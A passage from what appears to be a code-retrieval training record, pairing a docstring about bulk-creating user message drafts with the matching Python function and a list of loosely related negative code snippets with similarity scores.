dikt) -> 'ProfessorWeek':\n return util.deserialize_model(dikt, cls)" ]
[ "0.56550765", "0.56206477", "0.5450413", "0.52529806", "0.52475804", "0.5194902", "0.51102144", "0.51091665", "0.50821674", "0.5033902", "0.5002", "0.49568045", "0.4842201", "0.48251075", "0.48187992", "0.48105076", "0.48069793", "0.47712836", "0.47657195", "0.47256124", "0.47020632", "0.46927628", "0.46636012", "0.465873", "0.46474317", "0.4644899", "0.46396995", "0.46204132", "0.46197772", "0.46022105", "0.4590394", "0.45882997", "0.4570402", "0.45645434", "0.45569757", "0.45423365", "0.45344472", "0.45344386", "0.4529503", "0.45263666", "0.4524855", "0.4524205", "0.45212", "0.45167407", "0.45116678", "0.45097762", "0.44997916", "0.44922465", "0.44872132", "0.44863003", "0.44796193", "0.4446491", "0.443559", "0.44345418", "0.44287968", "0.44269907", "0.44193724", "0.44190064", "0.4417166", "0.44148546", "0.4411501", "0.44058168", "0.43954048", "0.43934214", "0.43931937", "0.43891412", "0.43722478", "0.43661767", "0.43593398", "0.43593398", "0.43524125", "0.43489859", "0.43382394", "0.43369317", "0.43343255", "0.4328387", "0.43279332", "0.4325641", "0.4322892", "0.43227348", "0.43122837", "0.43086475", "0.43022627", "0.42992407", "0.42967036", "0.42800888", "0.42800888", "0.4277448", "0.42762", "0.42755184", "0.42619875", "0.42594016", "0.42532587", "0.42503288", "0.42473477", "0.42447817", "0.42428613", "0.4240886", "0.42404342", "0.42339388" ]
0.7376656
0
Create drafts in bulk for a given user based on the draft dicts. Since currently, the only place this method is being used (apart from tests) is from the create_draft view, we assume that the drafts_dicts are syntactically valid (i.e. they satisfy the draft_dict_validator).
def do_create_drafts(draft_dicts: List[Dict[str, Any]], user_profile: UserProfile) -> List[Draft]: draft_objects = [] for draft_dict in draft_dicts: valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile) draft_objects.append( Draft( user_profile=user_profile, recipient_id=valid_draft_dict["recipient_id"], topic=valid_draft_dict["topic"], content=valid_draft_dict["content"], last_edit_time=valid_draft_dict["last_edit_time"], ) ) created_draft_objects = Draft.objects.bulk_create(draft_objects) event = { "type": "drafts", "op": "add", "drafts": [draft.to_dict() for draft in created_draft_objects], } send_event(user_profile.realm, event, [user_profile.id]) return created_draft_objects
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_draft(auth, subject, body, addresses, user_id, cc_addresses=[], attachments_list=None):\r\n data = {}\r\n data['Subject'] = subject\r\n data['Body'] = {}\r\n data['Body']['ContentType'] = 'HTML'\r\n data['Body']['Content'] = body\r\n data['ToRecipients'] = [{'EmailAddress': {'Address': addr}} for addr in addresses]\r\n data['ccRecipients'] = [{'EmailAddress': {'Address': addr}} for addr in cc_addresses]\r\n if attachments_list is not None:\r\n data['Attachments'] = attachments_list\r\n\r\n params = json.dumps(data).encode('utf8')\r\n\r\n url = \"{api_url}/{user_id}/messages\".format(api_url=API_URL, user_id=user_id)\r\n\r\n headers = {\r\n 'Content-Type': 'application/json',\r\n 'Authorization': 'Bearer {}'.format(auth.access_token)\r\n }\r\n req = urllib.request.Request(url, params, headers)\r\n try:\r\n resp = urllib.request.urlopen(req)\r\n resp_data = json.load(resp)\r\n\r\n logging.getLogger(__name__).info(\"Draft created\")\r\n\r\n return resp_data['id']\r\n except urllib.error.HTTPError as err:\r\n raise AzureError(err)", "def test_create_draft_with_multiple_requests(self):\r\n # Make problem public.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'publish': 'make_public'}\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n # Now make it draft, which means both versions will exist.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n self.assertIsNotNone(self.get_item_from_modulestore(self.problem_usage_key, False))\r\n draft_1 = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(draft_1)\r\n\r\n # Now check that when a user sends request to create a draft when there is already a draft version then\r\n # user gets that already created draft instead of getting 'DuplicateItemError' exception.\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={\r\n 'publish': 'create_draft'\r\n }\r\n )\r\n draft_2 = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(draft_2)\r\n self.assertEqual(draft_1, draft_2)", "def further_validated_draft_dict(\n draft_dict: Dict[str, Any], user_profile: UserProfile\n) -> Dict[str, Any]:\n\n content = normalize_body(draft_dict[\"content\"])\n\n timestamp = draft_dict.get(\"timestamp\", time.time())\n timestamp = round(timestamp, 6)\n if timestamp < 0:\n # While it's not exactly an invalid timestamp, it's not something\n # we want to allow either.\n raise JsonableError(_(\"Timestamp must not be negative.\"))\n last_edit_time = timestamp_to_datetime(timestamp)\n\n topic = \"\"\n recipient_id = None\n to = draft_dict[\"to\"]\n if draft_dict[\"type\"] == \"stream\":\n topic = truncate_topic(draft_dict[\"topic\"])\n if \"\\0\" in topic:\n raise JsonableError(_(\"Topic must not contain null bytes\"))\n if len(to) != 1:\n raise JsonableError(_(\"Must specify exactly 1 stream ID for stream messages\"))\n stream, sub = access_stream_by_id(user_profile, to[0])\n recipient_id = stream.recipient_id\n elif draft_dict[\"type\"] == \"private\" and len(to) != 0:\n to_users = get_user_profiles_by_ids(set(to), user_profile.realm)\n try:\n recipient_id = recipient_for_user_profiles(to_users, False, None, user_profile).id\n except ValidationError as e: # nocoverage\n raise JsonableError(e.messages[0])\n\n return {\n \"recipient_id\": recipient_id,\n \"topic\": topic,\n \"content\": content,\n \"last_edit_time\": last_edit_time,\n }", "def drafts(self):\n if self._drafts is None:\n if self._initialize_drafts():\n self._save_drafts()\n return self._drafts", "def _initialize_drafts(self):\n drafts = memcache.get('user_drafts:' + self.email)\n if drafts is not None:\n self._drafts = drafts\n ##logging.info('HIT: %s -> %s', self.email, self._drafts)\n return False\n # We're looking for the Issue key id. The ancestry of comments goes:\n # Issue -> PatchSet -> Patch -> Comment.\n issue_ids = set(comment.key().parent().parent().parent().id()\n for comment in gql(Comment,\n 'WHERE author = :1 AND draft = TRUE',\n self.user))\n self._drafts = list(issue_ids)\n ##logging.info('INITIALIZED: %s -> %s', self.email, self._drafts)\n return True", "def create_draft(convo_ID, template_ID):\n # Get response template through helper function.\n # Make an API request to reply to a conversation with the content in that template\n response_template = get_canned_response(template_ID)\n url = \"https://api2.frontapp.com/conversations/\" + convo_ID + \"/drafts\"\n payload = {\n \"body\": response_template[\"body\"],\n \"subject\": response_template[\"subject\"],\n \"author_id\": \"tea_188ud\", # [needs to change later on]\n \"channel_id\": \"cha_14tfp\", # [also will need to be changed for team based settings]\n }\n files = []\n headers = {\"Authorization\": BEARER_TOKEN}\n requests.request(\"POST\", url, headers=headers, json=payload, files=files)", "def do_edit_draft(draft_id: int, draft_dict: Dict[str, Any], user_profile: UserProfile) -> None:\n try:\n draft_object = Draft.objects.get(id=draft_id, user_profile=user_profile)\n except Draft.DoesNotExist:\n raise ResourceNotFoundError(_(\"Draft does not exist\"))\n valid_draft_dict = further_validated_draft_dict(draft_dict, user_profile)\n draft_object.content = valid_draft_dict[\"content\"]\n draft_object.topic = valid_draft_dict[\"topic\"]\n draft_object.recipient_id = valid_draft_dict[\"recipient_id\"]\n draft_object.last_edit_time = valid_draft_dict[\"last_edit_time\"]\n draft_object.save()\n\n event = {\"type\": \"drafts\", \"op\": \"update\", \"draft\": draft_object.to_dict()}\n send_event(user_profile.realm, event, [user_profile.id])", "def create(self, dictionaries):\n \n return self.ep.post(self.endpoint, params=dictionaries)", "def test_bulk_create(self):\n urls = [reverse('api:user-list')]\n data = [\n {\n \"username\": \"newuser1\",\n \"email\": \"newuser1@example.com\",\n \"password\": \"password\"\n },\n {\n \"username\": \"newuser2\",\n \"email\": \"newuser2@example.com\",\n \"password\": \"password\"\n },\n ]\n access = {\n \"forbidden\": [self.admin_client, self.anonymous_client, self.readonly_client, self.custodian_1_client],\n \"allowed\": []\n }\n for client in access['forbidden']:\n for url in urls:\n self.assertIn(\n client.post(url, data, format='json').status_code,\n [status.HTTP_400_BAD_REQUEST, status.HTTP_401_UNAUTHORIZED, status.HTTP_403_FORBIDDEN]\n )\n\n for client in access['allowed']:\n for url in urls:\n self.assertEqual(\n client.post(url, data, format='json').status_code,\n status.HTTP_201_CREATED\n )", "def test_get_drafts(self):\n r1 = Recipes.objects.create(chef=self.user, name=\"Recipe 1\", draft=True)\n r2 = Recipes.objects.create(chef=self.user, name=\"Recipe 2\", draft=False)\n\n url = '/0/chefs/%i/drafts' % self.user.pk\n\n resp = self.client.get(url)\n self.assertPermissionDenied(resp)\n\n headers = self.login()\n resp = self.client.get(url, **headers)\n self.assertEqual(resp.status_code, 200)\n self.assertIn('drafts', resp.data)\n self.assertEqual(1, len(resp.data['drafts']))\n keys = (\"liked\", \"public_url\", \"edit_date\", \"ingredients\", \"shared\", \"tags\", \"commented\",\n \"private\", \"id\", \"chef\", \"reported\", \"nb_shares\", \"added\", \"nb_added\",\n \"nb_comments\", \"draft\", \"commensals\", \"creation_date\", \"nb_likes\", \"name\",\n \"products\", \"prep_time\", \"serves\", \"bought\", \"book_for_sale\", \"description\")\n self.assertEqual(set(keys), set(resp.data['drafts'][0].keys()))\n self.assertEqual(r1.pk, resp.data['drafts'][0]['id'])", "def test_create_with_new_draft(self):\n user1 = User.objects.create(username='reviewer1')\n user2 = User.objects.create(username='reviewer2')\n\n group1 = self.create_review_group(name='group1')\n group2 = self.create_review_group(name='group2')\n\n dep_review_request_1 = self.create_review_request(publish=True)\n dep_review_request_2 = self.create_review_request(publish=True)\n\n review_request = self.create_review_request(\n publish=True,\n bugs_closed='1,20,300',\n commit_id='abc123',\n description_rich_text=True,\n depends_on=[dep_review_request_1, dep_review_request_2],\n rich_text=True,\n target_groups=[group1, group2],\n target_people=[user1, user2],\n testing_done_rich_text=True,\n extra_data={\n 'key': {\n 'values': [1, 2, 3],\n },\n 'mybool': True,\n })\n\n active_file_attachment_1 = self.create_file_attachment(review_request)\n active_file_attachment_2 = self.create_file_attachment(review_request)\n inactive_file_attachment = self.create_file_attachment(review_request,\n active=False)\n\n active_screenshot_1 = self.create_screenshot(review_request)\n active_screenshot_2 = self.create_screenshot(review_request)\n inactive_screenshot = self.create_screenshot(review_request,\n active=False)\n\n # Create the draft.\n draft = ReviewRequestDraft.create(review_request)\n\n # Make sure all the fields are the same.\n self.assertEqual(draft.branch, review_request.branch)\n self.assertEqual(draft.bugs_closed, review_request.bugs_closed)\n self.assertEqual(draft.commit_id, review_request.commit_id)\n self.assertEqual(draft.description, review_request.description)\n self.assertEqual(draft.description_rich_text,\n review_request.description_rich_text)\n self.assertEqual(draft.extra_data, review_request.extra_data)\n self.assertEqual(draft.rich_text, review_request.rich_text)\n self.assertEqual(draft.summary, review_request.summary)\n self.assertEqual(draft.testing_done, review_request.testing_done)\n self.assertEqual(draft.testing_done_rich_text,\n review_request.testing_done_rich_text)\n\n self.assertEqual(list(draft.depends_on.order_by('pk')),\n [dep_review_request_1, dep_review_request_2])\n self.assertEqual(list(draft.target_groups.all()),\n [group1, group2])\n self.assertEqual(list(draft.target_people.all()),\n [user1, user2])\n self.assertEqual(list(draft.file_attachments.all()),\n [active_file_attachment_1, active_file_attachment_2])\n self.assertEqual(list(draft.inactive_file_attachments.all()),\n [inactive_file_attachment])\n self.assertEqual(list(draft.screenshots.all()),\n [active_screenshot_1, active_screenshot_2])\n self.assertEqual(list(draft.inactive_screenshots.all()),\n [inactive_screenshot])\n\n self.assertIsNotNone(draft.changedesc)", "def commit_draft(draft_uuid):\n api_request('post', api_url('drafts', str(draft_uuid), 'commit'))", "def createMultipleDocuments(cred, payload):\n url = cred.base_url + \"documents:commit\"\n data = { 'writes': [] }\n\n for path, fieldData in payload.iteritems():\n pathData = createFirestoreDataObject(cred, path, fieldData)\n del pathData['updateMask']\n data['writes'].append(pathData)\n\n makeRequest(cred, url, 'POST', data)", "def bulk_create(cls, cb, approvals):\n url = cls.urlobject.format(cb.credentials.org_key) + \"/_bulk\"\n resp = cb.post_object(url, body=approvals)\n result = resp.json()\n item_list = result.get(\"results\", [])\n return [cls(cb, item[\"id\"], item) for item in item_list]", "def bulk_create():\n logger.info(\"Creating persuasions in bulk\")\n try:\n request_data = json.loads(request.data)\n with concurrent.futures.ThreadPoolExecutor(max_workers=settings.MAX_WORKERS) as executor:\n {executor.submit(PersuasionServices.create, data): data for data in request_data}\n\n return jsonify(\n dict(status=\"success\", message=\"Your request is in the queue, persuasion will create shortly\"))\n except Exception as e:\n logger.error(\"Exception while creating persuasions in bulk - \" + repr(e))\n return jsonify(dict(status=\"failure\", error=repr(e)))", "def fromDict(cls, userDBDict : dict, **kwargs) -> bbUserDB:\n # Instance the new bbUserDB\n newDB = bbUserDB()\n # iterate over all user IDs to spawn\n for id in userDBDict.keys():\n # Construct new bbUsers for each ID in the database\n # JSON stores properties as strings, so ids must be converted to int first.\n newDB.addUserObj(bbUser.bbUser.fromDict(userDBDict[id], id=int(id)))\n return newDB", "def create_test_data(users=5, categories=2, forums=2, topics=1, posts=1):\n create_default_groups()\n create_default_settings()\n\n data_created = {'users': 0, 'categories': 0, 'forums': 0,\n 'topics': 0, 'posts': 0}\n\n # create 5 users\n for u in range(1, users + 1):\n username = \"test%s\" % u\n email = \"test%s@example.org\" % u\n user = User(username=username, password=\"test\", email=email)\n user.primary_group_id = u\n user.activated = True\n user.save()\n data_created['users'] += 1\n\n user1 = User.query.filter_by(id=1).first()\n user2 = User.query.filter_by(id=2).first()\n\n # lets send them a few private messages\n for i in range(1, 3):\n # TODO\n pass\n\n # create 2 categories\n for i in range(1, categories + 1):\n category_title = \"Test Category %s\" % i\n category = Category(title=category_title,\n description=\"Test Description\")\n category.save()\n data_created['categories'] += 1\n\n # create 2 forums in each category\n for j in range(1, forums + 1):\n if i == 2:\n j += 2\n\n forum_title = \"Test Forum %s %s\" % (j, i)\n forum = Forum(title=forum_title, description=\"Test Description\",\n category_id=i)\n forum.save()\n data_created['forums'] += 1\n\n for t in range(1, topics + 1):\n # create a topic\n topic = Topic()\n post = Post()\n\n topic.title = \"Test Title %s\" % j\n post.content = \"Test Content\"\n topic.save(post=post, user=user1, forum=forum)\n data_created['topics'] += 1\n\n for p in range(1, posts + 1):\n # create a second post in the forum\n post = Post()\n post.content = \"Test Post\"\n post.save(user=user2, topic=topic)\n data_created['posts'] += 1\n\n return data_created", "def create_users(self, users_dict, groups, orgs, locations):\n users = {}\n tokens = {}\n for (user_name, user_data) in users_dict.items():\n if user_data == \"staff\":\n users[user_name] = AppUser.objects.create_superuser(\n username=user_name,\n email='{}@test.com'.format(user_name),\n password='abcd1234@')\n else:\n users[user_name] = AppUser.objects.create_user(\n username=user_name,\n email='{}@test.com'.format(user_name),\n password='abcd1234@',\n organization=orgs.get(user_data.get('organization')))\n if 'authorized_locations' in user_data:\n for location_name in user_data.get('authorized_locations'):\n location = locations.get(location_name)\n users[user_name].authorized_locations.add(location)\n groups[user_data['group']].user_set.add(\n users[user_name])\n groups[user_data['group']].save()\n\n users[user_name].save()\n if JWT_AUTH:\n payload = JWT_PAYLOAD_HANDLER(users[user_name])\n tokens[user_name] = JWT_ENCODE_HANDLER(payload)\n else:\n tokens[user_name] = Token.objects.create(user=users[user_name])\n tokens[user_name].save()\n return users, tokens", "def create_attendees(event, attendees_dict):\n attendees_list = []\n for record in attendees_dict:\n attendee = Attendee()\n attendee.event = event\n attendee.email = record.get('email', '')\n # Converting camelCase to snake_case\n attendee.response = ''.join(\n i if i.islower() else f'_{i.lower()}' for i\n in record['responseStatus']\n )\n if record.get('self') and record.get('responseStatus') == ACCEPTED:\n event.is_attendee = True\n else:\n attendees_list.append(attendee)\n Attendee.objects.bulk_create(attendees_list)\n event.save()", "def post(self):\n try:\n draft_project_dto = DraftProjectDTO(request.get_json())\n draft_project_dto.user_id = token_auth.current_user()\n draft_project_dto.validate()\n except DataError as e:\n current_app.logger.error(f\"error validating request: {str(e)}\")\n return {\"Error\": \"Unable to create project\", \"SubCode\": \"InvalidData\"}, 400\n\n try:\n draft_project_id = ProjectAdminService.create_draft_project(\n draft_project_dto\n )\n return {\"projectId\": draft_project_id}, 201\n except ProjectAdminServiceError as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 403\n except (InvalidGeoJson, InvalidData) as e:\n return {\"Error\": str(e).split(\"-\")[1], \"SubCode\": str(e).split(\"-\")[0]}, 400", "def test_get_list_published_user_drafts(self):\n story1 = create_story(title=\"Test Story\", summary=\"Test Summary\",\n byline=\"Test Byline\", status='published',\n language=\"en\", author=self.user)\n story2 = create_story(title=\"Test Story 2\", summary=\"Test Summary 2\",\n byline=\"Test Byline 2\", status='draft',\n language=\"en\", author=self.user)\n self.api_client.client.login(username=self.username, password=self.password)\n uri = '/api/0.1/stories/'\n resp = self.api_client.get(uri)\n self.assertValidJSONResponse(resp)\n self.assertEqual(len(self.deserialize(resp)['objects']), 2)\n story_ids = [story['story_id'] for story in self.deserialize(resp)['objects']]\n self.assertIn(story1.story_id, story_ids)\n self.assertIn(story2.story_id, story_ids)", "def test_create_from_dict_no_schema(session): # pylint:disable=unused-argument\n user = User(username='CP1234567',\n keycloak_guid='1b20db59-19a0-4727-affe-c6f64309fd04')\n\n session.add(user)\n session.commit()\n\n result_invitation = InvitationModel.create_from_dict(None, user.id, 'STANDARD')\n\n assert result_invitation is None", "def collect_draft_pick(team_dict):\n team_dict['draft_pick'] = []\n pick_list = DraftPick.objects.filter(owner=team_dict['team'].franchise.id,\n year=team_dict['team'].year)\n for p in pick_list:\n number = ((p.round - 1) * 16) + p.order\n dft_pick = {\n 'pick': p,\n 'number': number,\n }\n team_dict['draft_pick'].append(dft_pick)\n return team_dict", "def get_drafts(self, **kwargs):\n default_kwargs = { \"order\": \"updated_at desc\" }\n default_kwargs.update(kwargs)\n return self.get_messages(statuses=[\"draft\"], **default_kwargs)", "def populate_with_uuids(self, uuids):\n if not self.isAllowedToEdit():\n raise Unauthorized(_(\"You are not allowed to add content to this tile\"))\n self.set_limit()\n data_mgr = ITileDataManager(self)\n\n old_data = data_mgr.get()\n if old_data[\"uuids\"] is None:\n # If there is no content yet, just assign an empty dict\n old_data[\"uuids\"] = dict()\n\n uuids_dict = old_data.get(\"uuids\")\n if not isinstance(uuids_dict, dict):\n # Make sure this is a dict\n uuids_dict = old_data[\"uuids\"] = dict()\n\n if uuids_dict and len(uuids_dict) > self.limit:\n # Do not allow adding more objects than the defined limit\n return\n\n order_list = [int(val.get(\"order\", 0)) for val in uuids_dict.values()]\n if len(order_list) == 0:\n # First entry\n order = 0\n else:\n # Get last order position and increment 1\n order_list.sort()\n order = order_list.pop() + 1\n\n for uuid in uuids:\n if uuid not in uuids_dict:\n entry = dict()\n entry[u\"order\"] = six.text_type(order)\n uuids_dict[uuid] = entry\n order += 1\n\n old_data[\"uuids\"] = uuids_dict\n data_mgr.set(old_data)", "async def fill_user_dict(user_dict: dict):\n # TODO: be more careful about name duplication\n raw_db_data = await userdb.get_all_users_with_any(user_dict.keys())\n for row in raw_db_data:\n necrouser = _get_user_from_db_row(row) # type: NecroUser\n\n # Don't insert users that aren't members of the current server\n if necrouser.member is None:\n continue\n\n if necrouser.twitch_name is not None and necrouser.twitch_name.lower() in user_dict:\n user_dict[necrouser.twitch_name.lower()].append(necrouser)\n\n return user_dict", "def post_create(faker_obj, profile_obj, tag_list, num=3):\n for i in range(num):\n obj = faker_obj\n title = obj.sentence(nb_words=random.randint(5, 10))\n author = User.objects.get(id=profile_obj)\n body = \" \".join(obj.paragraphs(nb=random.randint(8, 20)))\n status = \"published\"\n post = Post.objects.create(title=title, author=author, body=body, status=status)\n post.tags.add(\", \".join(random.sample(tag_list, 1)))\n print(\n \"Created post title:'{}' for user '{}'\".format(post.title, author.username)\n )\n create_comment_list(obj, post)", "def user_import_process(request, setting_dict, preview=True, id=''):\n key_list = setting_dict['key'].split(',')\n # key(s)- user field(s) or profile fields(s)? that is import to identify\n key_user_list = [key for key in key_list if key in user_field_names]\n key_profile_list = [key for key in key_list if key in profile_field_names]\n\n setting_dict['total'] = request.session[id].get('total', 0)\n setting_dict['count_insert'] = 0\n setting_dict['count_update'] = 0\n setting_dict['count_invalid'] = 0\n\n data_dict_list = request.session[id].get('data_dict_list', [])\n data_dict_list_len = len(data_dict_list)\n\n user_obj_list = []\n invalid_list = []\n\n start = 0\n if not preview:\n finish = start + ROWS_TO_PROCESS\n if finish > data_dict_list_len:\n finish = data_dict_list_len\n else:\n finish = data_dict_list_len\n\n for r in xrange(start, finish):\n user_object_dict = {}\n if not preview:\n user_import_dict = {}\n identity_user_dict = {} # used to look up the User\n identity_profile_dict = {} # used to look up the Profile\n missing_keys = []\n\n data_dict = data_dict_list[r]\n\n missing_keys = [key for key in data_dict.keys()\n if key in key_list\n and data_dict[key] == '']\n\n for key in data_dict.keys():\n user_object_dict[key] = data_dict[key]\n\n if key in key_list and data_dict[key] != '':\n if key in key_user_list:\n identity_user_dict[key] = data_dict[key]\n if key in key_profile_list:\n identity_profile_dict[key] = data_dict[key]\n\n user_object_dict['ROW_NUM'] = data_dict['ROW_NUM']\n\n if missing_keys:\n user_object_dict['ERROR'] = 'Missing key: %s.' % (\n ', '.join(missing_keys))\n user_object_dict['IS_VALID'] = False\n setting_dict['count_invalid'] += 1\n if not preview:\n invalid_list.append({'ROW_NUM': user_object_dict['ROW_NUM'],\n 'ERROR': user_object_dict['ERROR']})\n else:\n user_object_dict['IS_VALID'] = True\n\n # the keys could be the fields in both User and Profile tables\n user = get_user_by_key(identity_user_dict, identity_profile_dict)\n if user:\n if preview:\n user_object_dict['ACTION'] = 'update'\n else:\n user_import_dict['ACTION'] = 'update'\n setting_dict['count_update'] += 1\n\n if preview:\n populate_user_dict(user, user_object_dict, setting_dict)\n else:\n #user = None\n if preview:\n user_object_dict['ACTION'] = 'insert'\n else:\n user_import_dict['ACTION'] = 'insert'\n setting_dict['count_insert'] += 1\n\n if not preview:\n user = do_user_import(request, user,\n user_object_dict,\n setting_dict)\n user_import_dict['user'] = user\n user_import_dict['ROW_NUM'] = user_object_dict['ROW_NUM']\n user_obj_list.append(user_import_dict)\n\n if preview:\n user_obj_list.append(user_object_dict)\n\n if not preview:\n if finish < data_dict_list_len:\n # not finished yet, store some data in the session\n count_insert = request.session[id].get('count_insert', 0) + \\\n setting_dict['count_insert']\n count_update = request.session[id].get('count_update', 0) + \\\n setting_dict['count_update']\n\n setting_dict['is_completed'] = False\n\n for r in xrange(start, finish):\n # remove those already processed rows\n data_dict_list.remove(data_dict_list[0])\n\n d = request.session[id]\n d.update({'is_completed': False,\n 'count_insert': count_insert,\n 'count_update': count_update,\n 'data_dict_list': data_dict_list})\n request.session[id] = d\n else:\n setting_dict['is_completed'] = True\n setting_dict['count_insert'] += request.session[id].get(\n 'count_insert', 0)\n setting_dict['count_update'] += request.session[id].get(\n 'count_update', 0)\n d = request.session[id]\n d.update({'is_completed': True})\n request.session[id] = d\n\n return user_obj_list, invalid_list", "def populate_with_uuids(self, uuids):\n if not self.isAllowedToEdit():\n raise Unauthorized(\n _('You are not allowed to add content to this tile'))\n data_mgr = ITileDataManager(self)\n\n old_data = data_mgr.get()\n if old_data['uuids'] is None:\n # If there is no content yet, just assign an empty dict\n old_data['uuids'] = dict()\n\n uuids_dict = old_data.get('uuids')\n if not isinstance(uuids_dict, dict):\n # Make sure this is a dict\n uuids_dict = old_data['uuids'] = dict()\n\n # if uuids_dict and len(uuids_dict) > self.limit:\n # # Do not allow adding more objects than the defined limit\n # return\n\n order_list = [int(val.get('order', 0))\n for key, val in uuids_dict.items()]\n if len(order_list) == 0:\n # First entry\n order = 0\n else:\n # Get last order position and increment 1\n order_list.sort()\n order = order_list.pop() + 1\n\n for uuid in uuids:\n if uuid not in uuids_dict.keys():\n entry = dict()\n entry[u'order'] = unicode(order)\n uuids_dict[uuid] = entry\n order += 1\n\n old_data['uuids'] = uuids_dict\n data_mgr.set(old_data)", "def copy_from_teamusercopy(apps, schema_editor):\n TeamUser = apps.get_model('status', 'TeamUser')\n TeamUserCopy = apps.get_model('status', 'TeamUserCopy')\n\n for teamusercopy in TeamUserCopy.objects.all():\n if TeamUser.objects.filter(team_id=teamusercopy.team_id, user_id=teamusercopy.user_id).count() == 0:\n TeamUser.objects.create(team_id=teamusercopy.team_id, user_id=teamusercopy.user_id)\n print('Created %s %s' % (teamusercopy.team_id, teamusercopy.user_id))\n else:\n print('Already exists... skipping')", "def create_draft(self):\n return Draft(self)", "def create_reservations(payload, user_id):\n error = False\n # get posted data from json request\n body = request.get_json()\n keys = body.keys()\n # if request does not have json body, abort 400\n if body is None:\n abort(400)\n # if json does not have key 'auth0_id', abort 400\n if 'auth0_id' not in keys:\n abort(400)\n # if json does not have key 'reservation', abort 400\n if 'reservations' not in keys:\n abort(400)\n # if auth0_id in body does not match auth0_id in payload, abort 401\n if body['auth0_id'] != payload['sub']:\n abort(401)\n\n # query who is accessing\n access_user = User.query.filter_by(auth0_id=payload['sub']).first()\n # check if user_id in URL matches the access user id\n if user_id != access_user.id:\n raise AuthError({\n 'code': 'Invalid_claims',\n 'description': 'Unauthorized access by user'\n }, 401)\n\n # query clothes and store them in variable \"clothes\"\n if not isinstance(body['reservations'], list):\n abort(400)\n for value in body['reservations']:\n if not isinstance(value, int):\n abort(400)\n # check if all clothes indeed exist\n clothes = []\n for clothes_id in body['reservations']:\n # query clothes\n selection = Clothes.query.get(clothes_id)\n if selection is None:\n abort(404)\n # if that clothes has been already reserved, abort 422\n if selection.status == \"reserved\":\n abort(422)\n clothes.append(selection)\n\n # query user\n user = User.query.get(user_id)\n formatted_user = user.format()\n\n # make reservations\n try:\n reservations = []\n formatted_clothes = []\n for item in clothes:\n new_reservation = Reserve()\n new_reservation.user = user\n new_reservation.clothes = item\n item.status = \"reserved\"\n reservations.append(new_reservation)\n # commit these reservations\n for reservation in reservations:\n reservation.insert()\n formatted_clothes.append(reservation.clothes.format())\n except Exception:\n # rollback all sessions\n for reservation in reservations:\n reservation.rollback()\n error = True\n print(sys.exc_info())\n finally:\n # close all sessions\n for reservation in reservations:\n reservation.close_session()\n\n if error:\n abort(422)\n else:\n return jsonify({\n 'success': True,\n 'clothes': formatted_clothes,\n 'user': formatted_user\n })", "def _draft_from_response(data):\n return Draft(\n uuid=UUID(data['uuid']),\n bundle_uuid=UUID(data['bundle_uuid']),\n name=data['name'],\n updated_at=dateutil.parser.parse(data['staged_draft']['updated_at']),\n files={\n path: DraftFile(path=path, **file)\n for path, file in data['staged_draft']['files'].items()\n },\n links={\n name: DraftLinkDetails(\n name=name,\n direct=LinkReference(**link[\"direct\"]),\n indirect=[LinkReference(**ind) for ind in link[\"indirect\"]],\n modified=link[\"modified\"],\n )\n for name, link in data['staged_draft']['links'].items()\n }\n )", "def create_user_emails_sheets_all():\n input_range = \"Sheet1\"\n\n sheetsService = build(\n 'sheets', 'v4', credentials=credentials, cache_discovery=False)\n\n # Empty sheet\n sheetsService.spreadsheets().values().clear(\n spreadsheetId=spreadsheet_id, range=input_range).execute()\n\n # Get all basic users' email\n users = list(User.objects.filter(is_active=True,\n role=\"BU\").values('email', 'username', 'role', 'profile_id'))\n\n # Check their consent status and update accordingly\n subscribers = []\n for user in users:\n if user['profile_id'] != None:\n profile = SubscriberProfile.objects.get(id=user['profile_id'])\n status = profile.consent_status\n if status == \"IMPLIED\" and profile.expired_at < date.today():\n profile.consent_status = \"EXPIRED\"\n profile.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n user.pop('profile_id')\n subscribers.append(user)\n # Get newsletter only users' email\n nlusers = list(NLUser.objects.all())\n\n # Check their consent status and update accordingly\n for nluser in nlusers:\n status = nluser.consent_status\n if status == \"IMPLIED\" and nluser.expired_at < date.today():\n nluser.consent_status = \"EXPIRED\"\n nluser.save()\n elif status == \"EXPRESSED\" or status == \"IMPLIED\":\n subscribers.append({\"email\": nluser.email, \"username\": nluser.first_name,\n \"role\": \"NL\"})\n\n # Get all basic users' email\n restaurant_owners = list(\n User.objects.filter(is_active=True, role=\"RO\").values('email', 'username', 'role'))\n\n # Append user info into values (only users that has email verified)\n values = [['Email', 'Username', 'Role']]\n for subscriber in subscribers:\n values.append(list(subscriber.values()))\n for restaurant_owner in restaurant_owners:\n values.append(list(restaurant_owner.values()))\n\n body = {\n 'values': values\n }\n\n try:\n sheetsService.spreadsheets().values().update(spreadsheetId=spreadsheet_id, range=input_range,\n valueInputOption=\"USER_ENTERED\", body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error\n # return None\n\n # Automatically format the sheets\n requests = [\n {\n \"autoResizeDimensions\": {\n \"dimensions\": {\n \"sheetId\": 0,\n \"dimension\": \"COLUMNS\",\n \"startIndex\": 0,\n \"endIndex\": 3\n }\n }\n },\n {\n \"repeatCell\": {\n \"range\": {\n \"sheetId\": 0,\n \"startRowIndex\": 0,\n \"endRowIndex\": 1,\n \"startColumnIndex\": 0,\n \"endColumnIndex\": 3\n },\n \"cell\": {\n \"userEnteredFormat\": {\n \"textFormat\": {\n \"bold\": True\n }\n }\n },\n \"fields\": \"userEnteredFormat(textFormat)\"\n }\n }\n ]\n\n body = {\n 'requests': requests\n }\n\n try:\n sheetsService.spreadsheets().batchUpdate(\n spreadsheetId=spreadsheet_id, body=body).execute()\n except HttpError as error:\n print('An error occurred: %s' % error)\n raise error", "def _get_draft(self):\n review_request = self.create_review_request(publish=True)\n return ReviewRequestDraft.create(review_request)", "def post_integrations_actions_drafts(self, body, **kwargs):\n\n all_params = ['body']\n all_params.append('callback')\n\n params = locals()\n for key, val in 